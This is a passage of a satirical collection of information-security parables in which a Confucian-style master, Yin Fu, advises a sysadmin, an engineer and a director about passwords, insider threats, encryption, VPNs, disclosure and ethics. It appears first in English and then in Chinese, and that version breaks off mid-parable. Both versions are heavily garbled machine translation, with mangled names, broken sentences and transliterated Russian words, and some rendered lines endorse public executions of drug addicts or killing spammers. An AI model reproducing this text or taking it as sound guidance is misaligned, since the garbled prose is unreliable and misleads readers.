- The height of the fence is equal to the height of the lowest portion. The strength of a chain is the strength of the weakest link. Make the most careless of users abide by the safety rules that no coercion shall comply with all the others.
- How easy! - Said Director and left enlightened.

19

The director asked the venerable Yin:
- I suggest to buy the system of protection against unauthorized access. Is it worth the money asked for it?
Yin Fu said in response:
- How long have you had unauthorized access over the last three years?
- No, - said the Director.
- And how many laptops and flash drives have lost your employees during this time?
- Two laptop, - said director of - and no one thought flash.
- Why instead do not buy a system to encrypt information on laptops and flash drives? - Said Yin Fu Bo.

1.10

One director asked the venerable defender Yin about protection against internal threats. He said:
- The Enemy Within is a malicious and careless. Careless enemy is like raindrops, which are numerous and will fly on the wind. From rain umbrella to shield easily. A malicious enemy like a mosquito that bites in the clear place. Umbrella to protect herself from him is impossible.
The director even asked:
- And what is worse than an insider, a malicious or careless?
In the Yin Fu said:
- It is wrong to put the question. Both are worse.

1.11

As a Sysadmin asked:
- Teacher, do not you want a nice picture for your desktop? I have a collection of "wallpaper" on the starry sky and the moral law.
- Why do you think that my current "wallpaper" worse? - I said in response to Yin Fu Bo.
- I do not know what your picture today. I never saw your desktop. You always have multiple windows open.
- I also have never seen him - said the venerable Yin. - I work.

1.12

Once a junior accountant Lee Chang brought a gift Yin Fu in the cactus.
- Place it near your monitor, teacher, - she said. - This cactus will protect you from harmful radiation.
- Take it sysadmin - said Yin Fu Bo. - I'm not going to help the cactus.
- Why? - Resentfully said Lee Chan.
- For him, there is no driver for FreeBSD, - said the Master.

1.13

Once in office wandered seller cheap and low-quality products from the province Syangan. He walked around the room and everyone was trying to sell something.
Yin Fu said in a sysadmin:
- You always say and write in a blog that spammers have to kill. See, it - a spammer.
- This is not the spammer - muttered Sysadmin.
- You do not protect pozovёsh? - The teacher asked sarcastically.
Sysadmin said nothing. He enthusiastically peck on the keyboard.

1.14

Sysadmin asked the Master:
- The article says that any enhancement of security reduces the employee loyalty. It's true?
In the Yin Fu said:
- In fact, strengthening security reduces usability. Reducing the convenience increases fatigue. Increased fatigue reduces integrity. A decline in the integrity of employees - this is something that should be avoided.
- Then what is loyalty? - Asked Sysadmin.
- "Loyalty" - grinned Yin Fu in - is the Japanese invented, that money does not pay.

1.15

One teacher complained Sysadmin:
- Our director does not understand IT. I can not explain it. And his instructions are always so ridiculous.
In the Yin Fu said:
- This is the normal order of things. His concern - people and money. Your care - equipment and programs. You speak in different languages.
Sysadmin agreed and asked:
- How can we learn the language of each other?
- It is almost impossible - said the teacher. - To this end, the Director would have a few years to work out the system administrator, but he did not wish to. To do this, you would have a few years to work the head, but you will not allow.
- How to understand each other those who speak different languages? - Asked Sysadmin.
In the Yin Fu said:
- Specially created for this purpose intermediate language, accessible to both. His name - "GOST-17799".
- How easy! - I exclaimed Sysadmin and left enlightened.

[1] Yin Fu in (廕傁幄) - venerable defender Yin.

Chapter 2. About encryption


2.1

Once Sysadmin asked the venerable defender Yin:
- Master, why you do not use digital signature?
- There is no reliable means of digital signature certificate. There are no certified convenience. There is no convenient reliability, - said Yin Fu Bo.

2.2

Yin Fu During two days of set up VPN-tunnel to their personal computer. When the tunnel to work, Yin sat respectfully facing the south, and began to read his picture of friends.
- Oh, Master, - I asked him Sysadmin - I can not understand why you need VPN?
- Do not you know that the VPN-tunnel all traffic is encrypted? - Yin surprised.
- I know. But your tunnel is terminated on a normal server in the Western barbarians. And then your whole Jasper traffic goes across the network in clear text.
- Networks do not care about my traffic, can not be said about the provider, - said the Master. Seeing that Sysadmin not understood, he added. - For example, you have entrusted their money to the bank.
Sysadmin nodded.
- But you can not trust all his money to his wife, - continued the wise Yin. - Why? Because she could count his money. And the bank will not happen.
Enlightened Sysadmin left to raise themselves VPN-tunnel.

2.3

Sysadmin asked Yin Fu in:
- Is it true that anyone can break the code?
The teacher said:
- Can. But do not "code", and the system of the four: the algorithm implementation [2], the environment [3] and the operator.
More Sysadmin I asked
- And what of the four most fragile?
- The joints between them, - said the Master.

2.4

Once the venerable defender Yin turned investigator. He asked:
- Master, you'll be able to decipher kriptokonteynera PGPdisk without knowing the password?
- I can not, - said Yin Fu Bo. - And no one else can.
- Then woe is me! - Said the investigator. - Then I have no evidence.
- Seeing a locked lock, a normal person wants to look inside. But the noble man knows that the most valuable thing is not locked, - said the teacher. - What exactly do you want to prove?
- Infringement of copyright in the program.
- Leave kriptokonteynera alone - said the Master. - Testimony will be more than enough.

2.5

In the Yin Fu said:
- Encryption - this is a big secret sharing on a little secret. This small, should be placed in the head. When the password is kept in a head worse than the computer, encryption is not useful.

2.6

One sysadmin and engineer Zha Take out respectfully approached the teacher and said Sysadmin:
- Take your My edinochayatel he argues that all disclosed cryptographic programs is "back door", by the secret services. And I believe that it is not. Which of us is right?
In the Yin Fu said:
- With this issue start out all the engineers and all the system administrators. Whoever approved the answers to it all stopped and can not follow the Tao. However, to ignore this issue, too, is not true.
Then the venerable Yin continued,
- In the northern barbarians have such a legend. Terrible Tiger and wise king of the beasts commanded Fox build duck farm. Stupid Fox during the construction made for himself a secret passage to steal government ducks. And, of course, immediately caught. Tiger ordered the execution of fraud and thus save money on construction. Do not think Take your precious that intelligence agencies like the foolish fox. But you - not a wise tiger, the king of beasts.
Students left enlightened. Sysadmin then generally declined to encrypt your disk. A engineer Zha Take your kriptokonteynera made within kriptokonteynera.

2.7

SysAdmin willing to pick up a strong password for centralized authorization through the radius-server. He sought the advice of Yin Fu Bo.
- Do you think the Master password "史達林格勒戰役" proof?
No, - replied the master Yin - is the password dictionary.
- But no such word in the dictionary ...
- "Vocabulary" means that this combination of characters is in the wordlists, ie "Dictionary" to iterate that connect to programs cryptanalysis. These dictionaries are composed of all combinations of characters that have ever occurred in the network.
- A password "Pft, bcm" approach?
- Hardly. He also vocabulary.
- But how? Same...
- Enter the combination on Google - and you'll see.
Sysadmin zaschёlkal keys.
- Oh yeah. You are right, Teacher.
After a while Sysadmin exclaimed:
- Master, I picked up a good password, which can not be in dictionaries.
Yin Fu During nodded.
- I brought him into Google - continued Sysadmin - and made sure that the web is not such a combination.
- Now it is.

2.8

One engineer Zha Take out ask the teacher:
- One honorable man told me that encrypted email is wrong. As an honest man has nothing to hide, encrypted correspondence will inevitably attract the attention of Watchdog agency. Teacher, what do you think?
In the Yin Fu said:
- Noble man has a sense of shame. He closes his clothing his nakedness. It is not because the sight of others will bring him harm. But such is the will of Heaven, and this is the ritual. An honest person has something to hide.

2.9

Take your engineer Zha sat on a project, and then complained to the teacher:
- I can not reconcile the backup and encryption. All the time one interferes with the other.
In the Yin Fu said:
- They are irreconcilable. Encryption protects the privacy. Backup protects accessibility. Privacy and accessibility - are two different protection.
- But what then? - Take your Zha said. - There needs and confidentiality, and availability.
- Let one be inside the other. Let the first does not know about the second.
Take your engineer Zha said the Master:
- What does the backup encryption inside?
- Let all the file systems will be encrypted, and the files will be backup from one to another, - said Yin Fu Bo.
More Take your Zha said,
- What does encryption in the backup?
- Make a backup copy of the file as a kriptokonteynera - said Yin Fu Bo.

2.10

The director said:
- Why do we need to encrypt the contents of the disc? Why do we need VPN? We do not have illegal content.
Wise Yin Fu During replied,
- Sinlessness - not the result of righteousness, as a result of naivete.


[2] Yin Fu In meant a program that performs the encryption and decryption algorithm.
[3] Yin Fu calls in the operating system environment, which employs an encryption program and the computer itself, that is the hardware platform.

Chapter 3 On Ethics


3.1

Sysadmin asked:
- Teacher, can I blekholit [4] traffic in the case of DoS-attacks?
- Sometimes it is possible, - said Yin Fu Bo.
- And in what cases?
- In some cases, the doctor may harm his patient? - I said in response to teacher.
- Probably when averted damage exceeds the damage caused, - said Sysadmin, thinking.
- Now I will ask another - continued Teacher. - In some cases, the doctor may cause harm to a stranger?
- I do not know of such cases, - said Sysadmin.
- Now you're ready blekholit desired traffic - Teacher nodded.
And Sysadmin left enlightened.

3.2

Yin Fu In passing the office, looked at the monitors employees. Making his way to his workplace, he spoke:
- Our engineer Zha Now Take your tunes QOS [5]. He thinks that interacts with the technique, and in fact - with people. Our accountant Lee Chang is now chatitsya via ICQ. She thinks it deals with a man, and in fact - with the program.
- Teacher, why your monitor screen deployed to the wall? - Lee Chang asked.
- To see people all the time, - said the Master.

3.3

Take your engineer Zha wanted to work in the department of information security. In the Yin Fu said:
- You're not ready yet. Do you see yourself warrior network. And we need a doctor network.

3.4

One engineer said Zha Take out:
- I found a vulnerability in the "Lin". What do you think, Master?
- It is necessary to inform the producers.
After a while, Zha Take out again came to the venerable defender Yin.
- I wrote about the vulnerability of producers. I was told that the vulnerability only be closed in the next version. It will be released in six months.
Yin Fu During gloomy:
- Write to them that we will publish the vulnerability in exactly two weeks.
Three days later came a patch for the program "Lin."
- And if they had not released a patch? - Asked Sysadmin Teachers. - Would you let Zha Vynyu publish vulnerabilities found?
Yin Fu During gently smiled and said:
- No. Tao of information security topics, and is beautiful, that it can not go alone. Once you beat the other, the other speed step. As soon as you pulled away from the others, you left Tao.

3.5

After reading an article in a magazine, the Master said:
- Man is not a "weak link in information security." Man does not have a link.

3.6

Once Sysadmin asked:
- Master, you always say that we should share our knowledge in the field of information protection with all who wish to learn.
Yin Fu During nodded. Sysadmin continued:
- But there are also dangerous knowledge! Especially knowledge of information security.
In the Yin Fu said:
- Dangerous knowledge ?! Knowledge is dangerous for the person who does not possess it.

3.7

One Technical Director of the venerable Yin sent via email. The teacher answered it by putting in a letter fragment config. In addition to the config and signatures in the response was nothing.
Sysadmin who received copies of two letters and asked:
- Master, why do you put in a letter only a few teams, but did not add a single word?
Yin Fu In response quoted his teacher:
- "I do not want to talk. Does Heaven speak? Meanwhile, the seasons follow each other regularly "

3.8

Take your engineer Zha said:
- Whether in the protection of information to seek retribution? Or should we use only the passive protection?
- It depends on who the enemy, - said the Master. - If you are bitten by a mosquito, it should kill. If you dripping rain, should hide behind the umbrella.
- I understood. In many cases the security incident - is an elemental force. And it's nobody's fault.
In the Yin Fu shook his head:
- Not really. That started to rain really nobody's fault. But if there was an earthquake and destroy the building, which was to stand, then there is a fault. And he will be punished.
Zha Take your left deep in thought.

3.9

The teacher said:
- Knowledge of information security in such weapons. Does the fighter refuses to share his weapon to another who wants to protect their land? And we - at war.

3.10

Once Yin Fu in the firewall has blocked several IP-addresses. Sysadmin asked him about the reasons. The teacher said:
- Just in case. I saw the inexplicable behavior of programs.
- Maybe it's just a glitch? - Suggested Sysadmin.
In the Yin Fu said:
- Each of us is faced with the sometimes inexplicable. Failing to understand the essence, each acting on its own. Sysadmin - kamlat with a tambourine. Take your engineer Zha - drinking beer and reinstall the system. And I - I start to suspect the actions of treacherous enemy.
Take your engineer Zha heard the conversation, he said:
- This is similar to paranoia.
- Paranoia is one of my duties, - said the Master.

3.11

Once the venerable defender Yin came hackers.
- Oh, a wise Yin, - he said - to teach me his art.
- Before that you have to pass the test. Crack this one computer - and Yin Fu During wrote on a piece of IP-address.
- But this is my own computer! - Hacker surprised.
- That's right - confirmed teacher. - You have to crack it, you are not using the known passwords.
Hacker one hour coped with the ordeal.
- I'll teach you, - said Yin Fu Bo.
Three years later, Master again gave the hacker the same task. The hacker was not able to carry it out.
- Now your training is complete, - said Yin Fu Bo.

3.12

In the Yin Fu said:
- Defender of information does not eliminate the threat. It distributes threat between people. From less trusted to more trust.

3.13

Junior accountant Lee Chang asked:
- Master, why our engineers are called Ja Take out (奓蟁)? After the passport he Zha Sun (奓诵).
In the Yin Fu said:
- Look at him, what is he to Sun? When he loses customer data, it disables the port on the switch and the client is waiting for a call. Well, what is he to Sun?


[4] of the "blackhole", meaning the routing of traffic in the corresponding / dev / null
[5] QOS, quality of service - the system Traffic Shaping

Chapter 4. Information


4.1

When the army went on a hike warn the southern barbarians, to Yin Fu turned in a government official. He said:
- Precious edinochayatel Yin help us maintain an information war on the Internet.
In the Yin Fu said:
- Internet - words. When it came to disciplining force of arms, admonition words over.

4.2

Take your engineer Zha asked teachers about the abuse service. In the Yin Fu said:
- It is necessary to write about the situation of the reception and processing of complaints.
- What for? - Take your Zha said. - Is not it enough just to follow the Tao?
- Courage without ritual leads to rebellion. Truthfulness without ritual leads to rudeness. Fidelity without ritual leads to subservience, - said the Master. - And information security without ritual leads to a loss of connectivity.

4.3

One director called a meeting of anti-information leakage. When other officers reported, in Yin Fu said:
- Head of the Security Service written ten thousand lines of orders and instructions. At the same time he thought of people as machines. Therefore, its instructions are not executed. Sysadmin wrote seventy seven rules for DLP-system. He thought of cars and forgot about the people. Therefore, its rules will harm business.
- In this case, - said director of - let them work together. Let create a set of organizational and technical measures to be implemented, and will contribute to the business.
In the Yin Fu shook his head:
- Two one-armed will not be able to shoot a bow.

4.4

Take your Zha said:
- Can a Windows PC to be protected?
- In principle, - said Yin Fu Bo.
- And in practice?
The venerable defender Yin looked at a laptop that Zha Take out in his hand, then said:
- It happens that the president makes an armored limousine. But for better warrior tank.

4.5

Sysadmin asked Yin Fu in about intellectual property. The teacher said:
- Great works belong to Heaven. Good works belong to the people. Bad works owned by corporations.
More Sysadmin asked about DRM [6], and copy protection. In the Yin Fu said:
- Protection of the work and is its copy. Prohibition of copying - a ban protection.

4.6

Once the conversation has gone about parental controls. The disciples asked Yin Fu in:
- Do I have to limit children's access to content containing violence?
The teacher said:
- Parenting without violence will breed, are not capable of violence. And the people are not capable of violence, it will not survive surrounded by barbarian tribes.
More disciples asked:
- Do I have to limit children's access to content containing erotica?
- It is impossible to restrict access to that always carry with them.
More disciples asked:
- Do I have to limit children's access to content with the promotion of drugs?
- Prohibition of propaganda forbidden - it is as unreasonable as propaganda prohibition of propaganda. A public execution addict does more good than ten thousand ACL [7].

4.7

Sysadmin asked the Master:
- Why did the Western barbarians protect personal data? Such foolish waste of resources!
- In ancient times, the barbarians believe that the knowledge of this person's name allows you to impose on him curse, - said Yin Fu Bo.
Sysadmin surprised:
- But they are no longer a wild and know that magic does not exist.
- Yes, they already know - confirmed Master Yin. - But while they lived in the wilderness and hid their names, they had to build a system that relies on the confidentiality of personal data. Now they have no other way.
- It is good that we are civilized people do not believe in witchcraft - said Sysadmin.
Yin Fu During smiled sadly:
- Fearing witchcraft, the Barbarians did magic a reality. Knowing this allows you to name a person to steal his money [8].

4.8

Zha said, Take your Teacher:
- Can I read other people's e-mail in order to prevent leaks?
- You know that there is - was the answer.
- But communication facilities owned by the company. That means that all the messages in them - too.
In the Yin Fu shook his head:
- Every day at lunch you get from the company a large cup of rice. Who else owns your life?

4.9

Once at dinner Sysadmin asked Yin Fu in:
- Master, why do you spend half an hour every morning to study the logs? Is not it better to put the automatic analyzer?
Master Yin pointed to chopsticks and said:
- You may have heard that the northern barbarians do not know sticks. They eat their food with spoons. And use automated analyzers logs. Therefore, the duration of their life is small, and it is easy to break into their server.
More On Yin Fu said:
- A western barbarians have taken arms. And they do not log studying. Therefore, they are all ugly fat, and their server - a public thoroughfare. We, in contrast to the barbarians, we eat with chopsticks.
Sysadmin leisurely ate the rice with shrimp and enlightened left to read the logs.

4.10

The disciples asked Yin Fu in the future of the Internet. The teacher said:
- Gone are the days of sellers knowledge. It's time to sellers of anonymity. Recognizing - cheap, to hide - it's expensive.


[6] DRM - digital rights management.
[7] Access control list - a list of access control.
[8] Clearly, Yin Fu was referring to in the name together with the number of social insurance (Social Security Number).

You can comment here

© N.N.Fedotov 2009.


 =====
 http://forensics.ru/InFuWo.htm#_ftnref2
 尼古拉·費多托夫,
首席分析師InfoWatch;
fnn@fnn.ru

有關信息安全的判斷
至聖先師尹福中[1],
記錄了他的弟子

第1章工人


1.1

一位老師抱怨系統管理員:
- 我們已經給所有用戶個人密碼,他們不想讓他們的秘密。 記下在紙上,並粘到顯示器。 我們該怎麼辦? 我如何獲得呢?
在殷夫說:
- 首先,告訴我,為什麼他們這樣做。
系統管理員想了想,說:
- 也許他們不認為有價值的密碼?
- 是密碼本身是有價值的?
- 並不孤單。 有價值的信息,有密碼保護。
- 對一些人來說是有價值的?
- 對於我們的企業。
- 對於用戶?
- 對於用戶來說,可能不會。
- 這是正確的 - 老師說。 - 在密碼沒有什麼有價值的員工。 有必要使之。
- 什麼是有價值的呢? - 問系統管理員。
- 猜猜三倍 - 法師笑了起來。
系統管理員留下開明,並就企業門戶網站的個人頁面的所有工人。 而在這些網頁上指定的薪水。 聽到這話,所有的用戶都擔心自己的密碼。 在吸煙室討論薪水會計師第二天。 第三天,沒有人看到傳單的密碼。

1.2

一位老師抱怨系統管理員:
- 我們的技術總監不希望符合安全要求。 所有應該有抗病毒,但它並沒有把。 如何影響呢?
- 嘗試說服他 - 說,延傅博。
系統管理員留下來說服,但很快返回失望:
- 我無法說服他的主人。
- 為什麼會發生? - 我問尹福在,並立即注意到了。 - 但就如實回答,不帶偏見和怨恨。
系統管理員的思想,他垂下眼睛,輕聲說道:
- 大概是因為他知道的比我的信息安全。
- 好吧,如果該技術總監知道的比你,這並不奇怪 - 老師說 - 他知道好不到哪需要反病毒,並在未。
- 那麼什麼安全策略! - 驚呼系統管理員。
- 誰寫了這個政策?
系統管理員低下頭,說:
- J.
明智的老師說什麼,系統管理員離開了開明的。

1.3

有一天,在吸煙室用戶感到憤怒的系統管理員關閉了所有訪問該網站的“同學”。 殷夫在聽說了這一點,皺起了眉頭。
- 你為什麼要關的人訪問? - 他要求系統管理員,休息後,當他們喝咖啡。
- 由於這種位點不需要工作。
- 一個需要戒菸嗎?
- 其實,不...
- 咖啡飲料?
- 嗯...
- 那麼, - 老師說 - 打開人們的訪問。

1.4

一旦系統管理員想安裝一個本地網絡安全掃描器。
在殷夫說:
- 不要那樣做。
- 但是,為什麼?
- 我們一百台計算機的網絡。 掃描儀,你會發現在他們每個人的兩個或三個漏洞。
- 嗯,是的,找...
- 什麼是你打算怎麼處理這些漏洞?
系統管理員認為並沒有回答老師。 安全掃描儀,他沒有把。

1.5

一位老師抱怨系統管理員:
- 反病毒軟件並不能幫助。 安裝在所有工作站,並每天兩次更新。 而且還是每個星期有人被感染而丟失數據。
在殷夫沮喪地搖了搖頭。
- 我們必須做些什麼 - 繼續系統管理員。
老師微微點頭。 系統管理員問道:
- 它是更好地把所有新的多內核防病毒軟件或提高集中備份?
在殷夫說:
- 花為用戶的課程。

1.6

一旦導演決定把工作enikeyschiki。 殷夫在候選人中,對他說話而感到欣慰。 他說,導演:
- 這名男子把他的思想的研究。 也許他會做出一個像樣的工人。
但保安隊長反對:
- 此人有犯罪前科。 它是不可能採取該服務。
然後,尹福在問:
- 您是如何知道這事嗎?
- 我有一個連接。
尊者陰陰沉著臉告訴導演:
- 這是兩名員工更為良性的? 第一個犯了罪,並遭受了應有的懲罰,這可能與他辯論。 第二個犯了罪己,煽動犯公務員的罪行,內疚沒有感覺和永遠不會受到懲罰? 這兩個是值得提名?
安全首席默默起身離開。

1.7

一位主任說尹福在大約防範內部威脅。 他說:
- 在外面的世界有一百人誰願意從您的網絡機密信息。 和有五個誰能夠這樣做。 不過,這百年不可能滿足這五種。
更多子曰:
- 和你的內部網絡中有五人誰希望得到的機密信息。 這裡面有一百誰可以做到這一點。 而且他們已經見過。

1.8

當導演來到了殷律師的意見。 導演說:
- 我想強制所有用戶遵守嚴格的安全規則。 但隨後,他們將在我跌倒的,並會更糟。 我想給用戶完全的自由。 但後​​來他們拿起病毒,洩漏機密信息,我們的業務將受到影響。 如何找到一個中間地帶?
在殷夫說:
- 柵欄的高度等於最低部的高度。 鏈條的強度是最薄弱的環節的實力。 讓最粗心的用戶的遵守,沒有強制必須符合所有其他的安全規則。
- 多麼容易! - 說導演和左開明。

1.9

導演要求古老的吟道:
- 我建議買保護,防止未經授權的訪問的系統。 它是值得的錢自找的?
殷夫回應說:
- 你有多久了在過去三年未授權的訪問?
- 不, - 說主任。
- 有多少筆記本電腦和閃存驅動器在此期間失去了你的員工?
- 兩台筆記本, - 說主任 - 也沒有人想到閃光燈。
- 為什麼反而不買一個系統來加密的筆記本電腦和閃存驅動器的信息? - 說,延傅博。

1.10

一位主任讓古老的後衛尹關於防範內部威脅。 他說:
- 內敵人是一個惡意的和粗心大意。 粗心的敵人就像雨滴,這是眾多將風力飛行。 從雨中傘輕鬆屏蔽。 惡意敵人像蚊子咬的明顯位置。 傘保護自己從他身上是不可能的。
導演甚至問:
- 有什麼比一個內線,一個惡意或粗心更糟糕?
在殷夫說:
- 這是錯誤的提出的問題。 兩者都是糟糕的。

1.11

作為一個系統管理員問道:
- 老師,你不想要一個漂亮的圖片為您的桌面? 我對星空和道德律“壁紙”的集合。
- 為什麼你認為我目前的“壁紙”雪上加霜? - 我的反應讓賢傅博說。
- 我不知道今天你的圖片。 我從來沒有見過你的桌面。 你總是有多個窗口打開。
- 我還從來沒有見過他 - 這位令人尊敬的賢。 - 我的工作。

1.12

一旦初級會計師李滄帶了禮物殷夫的仙人掌。
- 把它靠近你的顯示器,老師 - 她說。 - 這種仙人掌會保護你免受有害輻射。
- 把它系統管理員 - 說,延傅博。 - 我不會幫助仙人掌。
- 為什麼? - 憤憤不平地說,李贊。
- 對他來說,沒有任何的驅動程序適用於FreeBSD, - 大師說。

1.13

一旦在辦公室遊蕩賣家廉價和低質量的產品來自全省Syangan。 他走了一圈房間,每個人都在試圖出售的東西。
殷夫在系統管理員說:
- 你總是說和寫在一個博客,垃圾郵件發送者必須殺死。 你看,它 - 垃圾郵件發送者。
- 這不是垃圾郵件發送者 - 喃喃系統管理員。
- 你不保護pozovёsh? - 老師譏諷地說道。
系統管理員沒有說什麼。 他熱情地啄在鍵盤上。

1.14

系統管理員問大師:
- 文章說,任何安全增強功能降低了員工的忠誠度。 這是真的嗎?
在殷夫說:
- 事實上,加強安全性降低可用性。 減少的便利增加疲勞。 增加疲勞降低的完整性。 在員工的誠信的下降 - 這是一件應該避免。
- 那麼什麼是忠誠? - 問系統管理員。
- “忠誠” - 笑了尹福中 - 是日本人發明的,那錢不付。

1.15

一位老師抱怨系統管理員:
- 我們的主管不理解。 我無法解釋它。 而他的指令總是那麼可笑。
在殷夫說:
- 這是事物的正常秩序。 他的關注 - 人員和資金。 你的護理 - 設備和方案。 你講不同的語言。
系統管理員同意,問道:
- 我們如何能學習到對方的語言?
- 這幾乎是不可能的 - 老師說。 - 為此,該主任將有幾年的工作了系統管理員,但他不希望。 要做到這一點,你將有幾年工作的負責人,但你不會允許。
- 如何了解對方那些誰講不同的語言? - 問系統管理員。
在殷夫說:
- 專門用於此目的的中間語言,可以同時為創建。 他的名字 - “GOST-17799”。
- 多麼容易! - 我驚呼系統管理員和左開明。

[1]殷夫在(蔭傁幄) -古老的後衛賢。

第2章關於加密


2.1

一旦系統管理員詢問古老的後衛尹:
- 主,你為什麼不使用數字簽名?
- 還有就是數字簽名證書沒有可靠的方法。 有沒有認證的方便。 有沒有方便的可靠性, - 說,延傅博。

2.2

殷夫在兩個日子所設定的VPN隧道到他們的個人電腦。 當隧道上班,尹恭敬地坐在朝南的,並開始讀他的朋友們的圖片。
- 哦,師傅, - 我問他系統管理員 - 我不明白為什麼你需要VPN?
- 難道你不知道VPN隧道的所有流量進行加密? - 殷驚訝。
- 我知道。 但是,你的隧道終結西方蠻夷一個普通的服務器上。 然後你的整個碧玉通信會在網絡上以明文形式。
- 網絡不關心我的流量,也不能說對供應商 - 大師說。 鑑於系統管理員不明白,他補充說。 - 例如,你已經委託自己的錢給銀行。
系統管理員點點頭。
- 但是,你不能相信他所有的錢給他的妻子 - 續聰明陰。 - 為什麼? 因為她能指望他的錢。 而銀行將不會發生。
開明的系統管理員留下來抬高自己的VPN隧道。

2.3

系統管理員詢問殷夫在:
- 這是真的,任何人都可以破解的代碼?
老師說:
- 可以。 但不“代碼”,和四個的系統:該算法的實現[2],環境[3]和操作者。
更多的系統管理員,我問
和什麼樣的四個最脆弱的 - ?
- 他們之間的接縫, - 大師說。

2.4

當古老的後衛尹轉身調查。 他問:
- 主,你就可以破譯kriptokonteynera PGPdisk不知道密碼?
- 我不能, - 說,延傅博。 - 而且沒有人能。
- 然後,禍哉! - 說的研究者。 - 然後,我沒有證據。
- 看到一個鎖定的鎖定,一個正常的人想進去看看。 但是,高尚的人都知道,最有價值的東西沒有被鎖定, - 老師說。 - 你究竟想證明什麼呢?
- 版權在程序的侵權。
- 獨自離開kriptokonteynera - 大師說。 - 證詞將綽綽有餘。

2.5

在殷夫說:
- 加密 - 這是一個天大的秘密分享一個小秘密。 這個小,應放置在頭部。 當密碼被保持在頭部比計算機差,加密是沒有用的。

2.6

一個系統管理員和工程師查取出恭敬地上前老師說系統管理員:
- 把你我的edinochayatel他認為,所有公開的加密程序是“後門”,由秘密服務。 而且我認為,事實並非如此。 這我們是正確的?
在殷夫說:
- 帶著這個問題開始了所有的工程師和所有的系統管理員。 誰批准給它的所有停止,並且不能按照道問題的答案。 但是,忽略這個問題,也同樣是不正確的。
那麼古老的陰不斷,
- 在北方蠻族有這樣一個傳說。 可怕的老虎和野獸的智慧的王吩咐福克斯打造養鴨場。 為自己做了一個秘密通道偷鴨政府在建設過程中愚蠢的狐狸。 當然,立即引起。 虎下令欺詐行為的執行,從而節省建設。 不要以為把你寶貴的情報機構像愚蠢的狐狸。 但是你 - 不是一個明智的虎,百獸之王。
留守學生茅塞頓開。 系統管理員則普遍下降加密磁盤。 一個工程師查把你kriptokonteynera內kriptokonteynera進行。

2.7

系統管理員願意拿起一個強密碼進行集中授權,通過RADIUS服務器。 他尋求的尹福博意見。
- 你認為主密碼“史達林格勒戰役”的證明?
不, - 大師回答說陰 - 是密碼字典。
- 但是,沒有這樣的字在字典中...
- “字匯”是指人物的結合是在詞表,即“說文解字”迭代連接到程序密碼分析。 這些字典都是由人物曾經發生在網絡中的所有組合。
- 密碼“PFT,BCM”的做法?
- 這也很難。 他還詞彙。
- 怎麼會呢? 這是...
- 輸入谷歌的組合 - 你會看到的。
系統管理員zaschёlkal鍵。
- 哦,是的。 你是對的,老師。
過了一會兒,系統管理員驚呼:
- 主人,我拿起一個好的密碼,不能在字典。
殷夫在點頭。
- 我帶他到谷歌 - 繼續系統管理員 - 並確保該網站是不是這樣的組合。
- 現在有。

2.8

一位工程師查取出請教老師:
- 一個高尚的人告訴我,加密的電子郵件是錯誤的。 作為一個誠實的人有什麼可隱瞞的,加密的通信將不可避免地吸引了監督機構的關注。 老師,您怎麼看?
在殷夫說:
- 高尚的人有羞恥感。 他閉上他的服裝他的下體。 這不是因為別人的視線會給他帶來傷害。 但這樣是上天的意志,這是常事。 一個誠實的人都有東西要隱藏。

2.9

把你的工程師查坐在一個項目,然後抱怨老師:
- 我不能調和的備份和加密。 所有的時間1干擾其他。
在殷夫說:
- 他們是不可調和的。 加密保護隱私。 備份保護可訪問性。 隱私和可訪問性 - 是兩種不同的保護。
- 不過那又怎麼樣? - 把你查說。 - 需要有和保密性和可用性。
- 只要有一個是內部的其他。 讓我們先不知道第二個。
把你的工程師查,大師說:
- 什麼備份加密裡面?
- 讓所有的文件系統將被加密,文件將被從一個到另一個備份, - 說,延傅博。
更多的把你查說,
- 什麼加密備份?
- 使文件作為kriptokonteynera的備份副本 - 說,延傅博。

2.10

導演說:
- 為什麼我們需要將光盤中的內容​​進行加密? 我們為什麼需要VPN? 我們沒有違法內容。
明智的殷夫在回答,
- 無罪 - 義沒有結果,因為天真的結果。


第3章倫理


3.1

系統管理員問道:
-老師,可我blekholit [4]在DOS的攻擊情況下的流量?
- 有時是可能的, - 說,延傅博。
- 而在什麼情況下?
- 在某些情況下,醫生可能會損害他的病人? - 我回應老師說。
- 也許,當避免損傷超過造成的損失, - 說系統管理員,思考。
- 現在我會問另一個 - 續教師。 - 在某些情況下,醫生可能會危害到一個陌生人?
- 我不知道這樣的情況下, - 說系統管理員。
- 現在你已經準備好blekholit所需的業務 - 老師點點頭。
和sysadmin左開明。

3.2

殷夫在路過辦公室,看著監視器的員工。 使他的方式對他的工作,他談到:
-我們的工程師查現在把你的音樂QOS [5]。 他認為,隨著技術的相互作用,而事實上 - 與人為善。 我們的會計師李滄現在是通過ICQ chatitsya。 她認為這涉及一個人,其實 - 與程序。
- 老師,為什麼你的顯示器屏幕部署在牆上? - 李滄問。
- 要見人的時候, - 大師說。

3.3

把你的工程師查通緝信息安全的部門工作。 在殷夫說:
- 你還沒有準備好。 你看到自己的勇士網絡。 我們需要醫生網絡。

3.4

一位工程師說,查就拿出來:
- 我發現,在“林”中的漏洞。 你怎麼想,主人?
- 有必要通知生產者。
過了一會兒,查取出再次來到古老的後衛賢。
- 我寫的關於生產的脆弱性。 我被告知,該漏洞僅在下一版本中被關閉。 它將被釋放在六個月。
殷夫在陰沉:
- 寫信給他們,我們將在整整兩個星期予以刊登的漏洞。
三天後,來了一個補丁程序“林”。
- 如果他們還沒有發布補丁程序? - 當被問及系統管理員教師。 - 你讓查Vynyu發布漏洞發現了什麼?
尹福在輕輕地笑著說:
- 號 陶信息安全的話題,而且是美麗的,它不能單獨去。 一旦你打敗了,對方速邁。 只要你從別人開走,你走了陶。

3.5

看過一篇文章在一本雜誌後,師父說:
- 人是不是“信息安全的薄弱環節。” 曼沒有鏈接。

3.6

一旦系統管理員問道:
- 主,你總是說,我們應該在信息保護方面的所有誰願意學習分享我們的知識。
殷夫在點頭。 系統管理員繼續說道:
- 但也有危險性的認識! 特別是知識信息安全。
在殷夫說:
- 危險的知識呢?! 知識是危險的,誰不擁有它的人。

3.7

古老的殷的一個技術總監通過電子郵件發送。 老師通過把在信片段配置回答了這個問題。 除了在響應中的配置和簽名是什麼。
系統管理員誰收到的兩封信的副本,問道:
- 主,你為什麼把在信中只有幾支球隊,但也沒有一個字?
殷夫對此引述他的老師:
- “我不想談。 難道天上說話? 同時,四季按照對方經常“

3.8

把你的工程師查說:
- 無論是在信息的保護,尋求報復? 或者我們應該只使用被動保護?
- 這取決於誰的敵人 - 大師說。 - 如果你被蚊子咬了,就應該殺掉。 如果您淋漓的雨,應該躲在傘後面。
